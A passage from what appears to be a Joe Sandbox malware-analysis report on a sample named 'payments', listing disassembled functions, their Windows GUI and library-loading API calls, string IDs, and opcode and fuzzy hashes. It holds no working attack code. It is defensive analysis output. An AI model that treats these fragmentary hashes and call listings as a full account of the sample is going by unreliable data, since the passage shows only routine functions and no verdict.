                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00CF9A65
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$MoveWindow
                                                                                                                          • String ID: Listbox
                                                                                                                          • API String ID: 3315199576-2633736733
                                                                                                                          • Opcode ID: 39b71ee8030dd4407d2ed14bc7c45ff464afa324308ef89a508f60b3f1b69466
                                                                                                                          • Instruction ID: 3b4b1333a7b775b59c65b235dc838d0835ad07f01ea2e0f3cef5b621d867b768
                                                                                                                          • Opcode Fuzzy Hash: 39b71ee8030dd4407d2ed14bc7c45ff464afa324308ef89a508f60b3f1b69466
                                                                                                                          • Instruction Fuzzy Hash: 0C21B33261021CBFDF618F54CC85FBB3BAAEF89754F018129FA54971A0C6719D5297A0
                                                                                                                          Function 00CCB5B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00CCB5D2
                                                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00CCB5E9
                                                                                                                          • SendMessageW.USER32(?,0000000D,?,00000000), ref: 00CCB621
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3850602802-2594219639
                                                                                                                          • Opcode ID: 2d7e98a3e8cd8580e2802fabda6b03e60def20695ed497399920063a5ef6941b
                                                                                                                          • Instruction ID: 11ffdaa9698b904a8fbc3d8e8c5177fdb5b541a87851ee60ff33bba7175370d5
                                                                                                                          • Opcode Fuzzy Hash: 2d7e98a3e8cd8580e2802fabda6b03e60def20695ed497399920063a5ef6941b
                                                                                                                          • Instruction Fuzzy Hash: 04216F72600218BFDF14DBA8C942EAEF7BDEF54340F10445AF505E3290DB71AE169AA4
                                                                                                                          Function 00CE87A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(00000402,00000000,00000000), ref: 00CE87F3
                                                                                                                          • SendMessageW.USER32(0000000C,00000000,?), ref: 00CE8834
                                                                                                                          • SendMessageW.USER32(0000000C,00000000,?), ref: 00CE885C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3850602802-2594219639
                                                                                                                          • Opcode ID: c58acd0f935f0b390f868f29d1bfb924a0ba314b1689bf83b08df67911370b79
                                                                                                                          • Instruction ID: 7fb3789dfbe908a7de27f966d13f914d7ddfa0ac02ba31a7334b05c19ab6d532
                                                                                                                          • Opcode Fuzzy Hash: c58acd0f935f0b390f868f29d1bfb924a0ba314b1689bf83b08df67911370b79
                                                                                                                          • Instruction Fuzzy Hash: C2213879200650EFDB10EB2AD885E2AB7EAFB09710B408055F919DB6B1CB31FC51DBA4
                                                                                                                          Function 00CFA409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CFA46D
                                                                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CFA482
                                                                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CFA48F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: msctls_trackbar32
                                                                                                                          • API String ID: 3850602802-1010561917
                                                                                                                          • Opcode ID: f101277af8e1f08844dd48b7a3be626d85549d08699ef2c9837b29bb93dcdd4f
                                                                                                                          • Instruction ID: adc5220498fcabdb8bd2591db276bbc93e19571ad491447856439c478a93f451
                                                                                                                          • Opcode Fuzzy Hash: f101277af8e1f08844dd48b7a3be626d85549d08699ef2c9837b29bb93dcdd4f
                                                                                                                          • Instruction Fuzzy Hash: C511E7B120030CBEEF245F65CC45FEB7B69EF89754F014118FB59A6091D6B1E811DB25
                                                                                                                          Function 00CF9617 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 00CF9699
                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00CF96A8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LengthMessageSendTextWindow
                                                                                                                          • String ID: @U=u$edit
                                                                                                                          • API String ID: 2978978980-590756393
                                                                                                                          • Opcode ID: 9464410aed55b878fca5065c584c215ca8748f41a2e9fdd80d244ac56fbecbb0
                                                                                                                          • Instruction ID: 46b1912de61f5c7119b1714ee8081457bd9b08cb555b999bb524a48f03a4effd
                                                                                                                          • Opcode Fuzzy Hash: 9464410aed55b878fca5065c584c215ca8748f41a2e9fdd80d244ac56fbecbb0
                                                                                                                          • Instruction Fuzzy Hash: F2115871100208AAEF915F649C40FFB3B6AEB153A8F204314FA75D72E0C7359C51AB61
                                                                                                                          Function 00CCB781 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00CCB7EF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: @U=u$ComboBox$ListBox
                                                                                                                          • API String ID: 3850602802-2258501812
                                                                                                                          • Opcode ID: 717478a89e7609771fbc14426bd7074af71500bc8d6bca73bced8528b9b23c73
                                                                                                                          • Instruction ID: 330fb8f2826e2f75de852312941c1c19c70c6dc719fdd394a20fc9820bb3b742
                                                                                                                          • Opcode Fuzzy Hash: 717478a89e7609771fbc14426bd7074af71500bc8d6bca73bced8528b9b23c73
                                                                                                                          • Instruction Fuzzy Hash: 0C01D471641118AFCB04EBA4CC97EFE3369BF45350B04061DF872A72D2EB705D0897A0
                                                                                                                          Function 00CCB67D Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00CCB6EB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: @U=u$ComboBox$ListBox
                                                                                                                          • API String ID: 3850602802-2258501812
                                                                                                                          • Opcode ID: c1baa73207ff21a50ecb6f89e11ba4aa89017e766d9a9ceccff30c8213103e3b
                                                                                                                          • Instruction ID: 44ee6b1474d6d31dbb3df5e4ddd79707757fe9046fece5f9925f89706caedd04
                                                                                                                          • Opcode Fuzzy Hash: c1baa73207ff21a50ecb6f89e11ba4aa89017e766d9a9ceccff30c8213103e3b
                                                                                                                          • Instruction Fuzzy Hash: FA018FB1641108ABCB08EBA4C957FFE73A89F05344F10002DF412A3281EB505F18A7B5
                                                                                                                          Function 00CCB700 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00CCB76C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: @U=u$ComboBox$ListBox
                                                                                                                          • API String ID: 3850602802-2258501812
                                                                                                                          • Opcode ID: 9235437b49b1d64d181a36ec3d2a8760fb7375441a3a6eca18c70ef77ba496f4
                                                                                                                          • Instruction ID: 3f822d121e0d952c366ce9c49cea669ee102bd2f1c930328f433d9f680451085
                                                                                                                          • Opcode Fuzzy Hash: 9235437b49b1d64d181a36ec3d2a8760fb7375441a3a6eca18c70ef77ba496f4
                                                                                                                          • Instruction Fuzzy Hash: 86018BB6641108BBCB01EBA4C953FFE73A89B05344F50002DF802B3292EB609F19A7B5
                                                                                                                          Function 00CFD974 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetForegroundWindow.USER32(?,00D51628,00D004C9,000000FC,?,00000000,00000000,?,?,?,00D0E47E,?,?,?,?,?), ref: 00CFD976
                                                                                                                          • GetFocus.USER32 ref: 00CFD97E
                                                                                                                            • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
                                                                                                                            • Part of subcall function 00CAB526: GetWindowLongW.USER32(?,000000EB), ref: 00CAB537
                                                                                                                          • SendMessageW.USER32(00E965A8,000000B0,000001BC,000001C0), ref: 00CFD9F0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3601265619-2594219639
                                                                                                                          • Opcode ID: da216baf3b43c9f2e7b1cc75d5202c518e329cfc8b5acdbe7efbe67b3be9f11e
                                                                                                                          • Instruction ID: 30150d91df3a7aa45beaa178b35ef7de253d86ae8f71ffe0360f2c5be57c8ad6
                                                                                                                          • Opcode Fuzzy Hash: da216baf3b43c9f2e7b1cc75d5202c518e329cfc8b5acdbe7efbe67b3be9f11e
                                                                                                                          • Instruction Fuzzy Hash: 730184352003109BC7108B28D884AB673ABBF89315F184369E92AC73A1DF319D46CB11
                                                                                                                          Function 00C91000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C9103B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C91052
                                                                                                                          • SendMessageW.USER32(?,0000000C,00000000,?), ref: 00C9101C
                                                                                                                          • GetParent.USER32 ref: 00D02026
                                                                                                                          • InvalidateRect.USER32(00000000,?,00000000,00000001,?,0000000C,00000000,?), ref: 00D0202D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$InvalidateParentRectTimeout
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3648793173-2594219639
                                                                                                                          • Opcode ID: 6650017750f76e0fc459924be04f60c57eac8fd9e9f4949d65afd15b5891387a
                                                                                                                          • Instruction ID: 45b16453882faa159addc593fe48187a2d44c415ad4bc6bfbd5f52dc258f7ee3
                                                                                                                          • Opcode Fuzzy Hash: 6650017750f76e0fc459924be04f60c57eac8fd9e9f4949d65afd15b5891387a
                                                                                                                          • Instruction Fuzzy Hash: 6EF0A0301003D8FBEF201F60DC4EF953BA9AB123C0F149015F9849B5A1CBA35892AB60
                                                                                                                          Function 00CB2287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00CB2350,?), ref: 00CB22A1
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00CB22A8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: RoInitialize$combase.dll
                                                                                                                          • API String ID: 2574300362-340411864
                                                                                                                          • Opcode ID: 61d15b0c4cb7f0d6474ecc3fd16adc4d5f6f6a0252d2005b889f68274ad9a7d5
                                                                                                                          • Instruction ID: c4f2dd682a17cb067dd8bd40bb6c517a1155e59f4ac4eaca8f8e44233e679ca5
                                                                                                                          • Opcode Fuzzy Hash: 61d15b0c4cb7f0d6474ecc3fd16adc4d5f6f6a0252d2005b889f68274ad9a7d5
                                                                                                                          • Instruction Fuzzy Hash: A2E01A746D4B11BFDB105F74EC4EFD43A6AAB11756F104020B512D52A0CFB44085CF36
                                                                                                                          Function 00CB235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00CB2276), ref: 00CB2376
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00CB237D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: RoUninitialize$combase.dll
                                                                                                                          • API String ID: 2574300362-2819208100
                                                                                                                          • Opcode ID: 09b1b2d9aca33cb8eaeaffe3d580953ec03a2db7ccb71dd6f6c65af717dbd518
                                                                                                                          • Instruction ID: 262e17447aedc7d8b6786057d43c122aef06d6add2cb2fdc00d0554fd3afa22c
                                                                                                                          • Opcode Fuzzy Hash: 09b1b2d9aca33cb8eaeaffe3d580953ec03a2db7ccb71dd6f6c65af717dbd518
                                                                                                                          • Instruction Fuzzy Hash: 23E0B674588710BFDB205F60FD0DF843AAAB711702F104414F90AD22B8DBB855449A36
                                                                                                                          Function 00D0AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LocalTime__swprintf
                                                                                                                          • String ID: %.3d$WIN_XPe
                                                                                                                          • API String ID: 2070861257-2409531811
                                                                                                                          • Opcode ID: 18cf4635ebe4f711f4fba40361e9f9593660c58007785102752c2f6d28cb9d37
                                                                                                                          • Instruction ID: f4af1e8ecab0c29e69ddec668491080911cc85613ac3a3b613949d0ba7143e18
                                                                                                                          • Opcode Fuzzy Hash: 18cf4635ebe4f711f4fba40361e9f9593660c58007785102752c2f6d28cb9d37
                                                                                                                          • Instruction Fuzzy Hash: 9AE08C71804718ABDA0097948D05AFA737CA704300F110082B84BA2080DB34CB84AA3A
                                                                                                                          Function 00C942F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00C942EC,?,00C942AA,?), ref: 00C94304
                                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C94316
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                          • API String ID: 2574300362-1355242751
                                                                                                                          • Opcode ID: 848dd88189ef71cacd23aed9f92455e3d3c24e9d67956387bcd267339b59e64f
                                                                                                                          • Instruction ID: e186a3370f993fd44f0066ab296e0b0b0495815b25495c5ce371212300170302
                                                                                                                          • Opcode Fuzzy Hash: 848dd88189ef71cacd23aed9f92455e3d3c24e9d67956387bcd267339b59e64f
                                                                                                                          • Instruction Fuzzy Hash: A0D0C770544712FFDB245F75E80CA5176E5BB18711B108429F555D2274DBB0D9C58A70
                                                                                                                          Function 00CF2205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00CF21FB,?,00CF23EF), ref: 00CF2213
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00CF2225
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: GetProcessId$kernel32.dll
                                                                                                                          • API String ID: 2574300362-399901964
                                                                                                                          • Opcode ID: b7d75699a789854b2388feb23fdd55550bb7387a482681a06155838440d000ce
                                                                                                                          • Instruction ID: 29758bb5a87bab2f06775fab0bafb1cfe278821f2ba7ff73e3299dfd10352417
                                                                                                                          • Opcode Fuzzy Hash: b7d75699a789854b2388feb23fdd55550bb7387a482681a06155838440d000ce
                                                                                                                          • Instruction Fuzzy Hash: 05D0A734900716BFD7214F30F80865176E5EB04310B10842DF851E2290DB70D8C48670
                                                                                                                          Function 00C9434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
